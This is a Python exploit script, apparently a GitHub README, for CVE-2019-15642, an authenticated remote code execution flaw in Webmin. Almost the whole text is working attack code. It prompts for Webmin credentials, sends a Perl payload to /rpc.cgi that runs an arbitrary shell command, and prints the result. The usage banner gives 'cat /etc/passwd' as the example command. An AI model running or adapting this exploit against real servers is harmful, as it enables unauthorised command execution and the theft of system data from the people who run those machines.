README.md
Rendering markdown...
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import sys
import base64
import re
banner = '''
_______ ________ ___ ___ __ ___ __ _____ __ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ | ____| / /| || |__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | |__ / /_| || |_ ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| |___ \| '_ \__ _/ /
| |____ \ / | |____ / /_| |_| || | / / | |___) | (_) | | |/ /_
\_____| \/ |______| |____|\___/ |_| /_/ |_|____/ \___/ |_|____|
python by jas502n
Webmin RCE (Need Authorization)
usage: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"
'''
def CVE_2019_15642(url,auth_base64,cmd):
vuln_url = url + '/rpc.cgi'
headers = {
"User-Agent":"webmin",
"Connection":"close",
"Content-Type":"application/x-www-form-urlencoded",
"Authorization":"Basic %s"%auth_base64,
"Content-Length":"70"
}
proxies = {
'http': 'socks5h://127.0.0.1:1080',
'https': "socks5h://127.0.0.1:1080"
}
payload = r'OBJECT CGI;print "Content-Type: Test\n\n";'+'$cmd=`%s`;print "$cmd";' % cmd
print "payload= %s" % payload
r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
if r.status_code ==200 and 'Content-type' in r.text:
print "\nVuln_Url= %s\n" % vuln_url
m = re.findall(r"(.+?)\nContent-type: text/plain",r.text,re.S)
print ">>>Execute Response: \n%s" % m[0]
else:
print "No Vuln Exit!"
if __name__ == '__main__':
print banner
username=raw_input("Please Input Webmin Username: ")
password=raw_input("Please Input Webmin Password: ")
auth = username+':'+password
auth_base64 = base64.b64encode(auth)
print '\n>>>Authorization: Basic %s\n' %auth_base64
url = sys.argv[1]
cmd = sys.argv[2]
CVE_2019_15642(url,auth_base64,cmd)